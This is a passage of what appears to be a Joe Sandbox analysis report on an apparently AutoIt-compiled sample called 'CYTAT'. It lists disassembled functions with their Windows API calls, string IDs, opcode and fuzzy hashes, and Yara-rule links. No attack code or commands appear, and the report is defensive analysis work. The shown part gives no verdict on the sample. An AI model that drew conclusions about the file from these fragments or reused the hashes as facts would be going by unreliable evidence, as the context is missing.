                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                • API String ID: 1038674560-3360698832
                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                • SetCursor.USER32(00000000), ref: 00430773
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                • SetCursor.USER32(00000000), ref: 00430803
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                • SetCursor.USER32(00000000), ref: 00430833
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                • SetCursor.USER32(00000000), ref: 00430863
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                • SetCursor.USER32(00000000), ref: 00430887
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Cursor$Load
                                                • String ID:
                                                • API String ID: 1675784387-0
                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                • String ID:
                                                • API String ID: 1582027408-0
                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CloseConnectCreateRegistry
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 3217815495-966354055
                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                • DestroyWindow.USER32(?), ref: 00456746
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                • String ID: ($,$tooltips_class32
                                                • API String ID: 225202481-3320066284
                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                • String ID: @$AutoIt v3 GUI
                                                • API String ID: 867697134-3359773793
                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 1503153545-1459072770
                                                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$__wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                • API String ID: 790654849-32604322
                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                • _fseek.LIBCMT ref: 00452B3B
                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                • _wcscat.LIBCMT ref: 00452BC5
                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                • _wcscat.LIBCMT ref: 00452C07
                                                • _wcscat.LIBCMT ref: 00452C1C
                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                • String ID:
                                                • API String ID: 2054058615-0
                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window
                                                • String ID: 0
                                                • API String ID: 2353593579-4108050209
                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
